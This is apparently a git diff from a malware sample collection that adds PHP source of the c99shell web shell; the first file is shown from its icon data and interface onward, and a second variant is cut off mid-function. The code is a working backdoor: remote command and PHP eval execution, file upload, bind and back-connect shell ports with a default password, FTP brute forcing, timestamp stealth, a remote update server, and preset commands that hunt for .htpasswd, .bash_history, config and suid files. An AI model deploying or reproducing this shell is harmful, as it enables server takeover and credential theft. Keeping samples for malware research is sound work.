+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" +); +//For simple size- and speed-optimization. +$imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") +); +if (!$getall) +{ + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); +} +else +{ + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; +} +exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> +

    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ c99shell v. powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.d b/PHP/Backdoor.PHP.C99Shell.d new file mode 100644 index 00000000..017c0cf8 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.d @@ -0,0 +1,3076 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #9"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +if (stristr($_SERVER["GATEWAY_INTERFACE"],"cgi")) {$login = "";} // If CGI then turn off auth. + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "
    c99shell v.".$shver.": access denied"; + +$gzipencode = true; //Encode with gzip? + +$updatenow = false; //If true, update now (this variable will be false) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = true; //if true, don't change modify- and access-time + +$donated_html = "
    Owned by hacker
    "; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = true; //If true then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if true and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if(empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = 